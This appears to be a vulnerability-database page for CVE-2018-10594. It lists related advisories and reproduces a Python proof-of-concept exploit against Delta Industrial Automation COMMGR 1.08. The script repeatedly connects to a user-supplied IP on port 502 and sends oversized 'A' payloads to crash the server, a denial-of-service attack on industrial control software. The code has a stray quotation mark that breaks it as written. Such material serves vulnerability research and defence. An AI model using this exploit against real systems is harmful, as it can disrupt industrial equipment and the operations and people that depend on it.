| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow Exploit | 3 Jul 201800:00 | – | zdt | |
| Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow Exploit | 9 Oct 201800:00 | – | zdt | |
| CVE-2018-10594 | 8 Oct 201815:13 | – | circl | |
| Delta Electronics Delta Industrial Automation COMMGR Buffer Overflow Vulnerability | 22 Jun 201800:00 | – | cnvd | |
| Delta Electronics Delta Industrial Automation Buffer Overflow (CVE-2018-10594) | 22 Oct 201800:00 | – | checkpoint_advisories | |
| CVE-2018-10594 | 26 Jun 201820:00 | – | cve | |
| CVE-2018-10594 | 26 Jun 201820:00 | – | cvelist | |
| Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC) | 2 Jul 201800:00 | – | exploitdb | |
| Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit) | 9 Oct 201800:00 | – | exploitdb | |
| Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC) | 2 Jul 201800:00 | – | exploitpack |
`# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR
- Remote STACK-BASED BUFFER OVERFLOW
# Date: 02.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.deltaww.com/
# Software Link:
http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US
# Version:
COMMGR Version 1.08 and prior.
DVPSimulator EH2, EH3, ES2, SE, SS2
AHSIM_5x0, AHSIM_5x1
# Tested on: Kali Linux
# CVE : CVE-2018-10594
#Run exploit, result DOS
import socket
ip = raw_input("[+] IP to attack: ")
sarr = []
i = 0
while True:
try:
sarr.append(socket.create_connection((ip,502)))
print "[+] Connection %d" % i
crash1 = "\x41"*4164"
sarr[i].send(crash1+'\r\n')
i+=1
except socket.error:
print "[*] Server crashed "
raw_input()
break
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation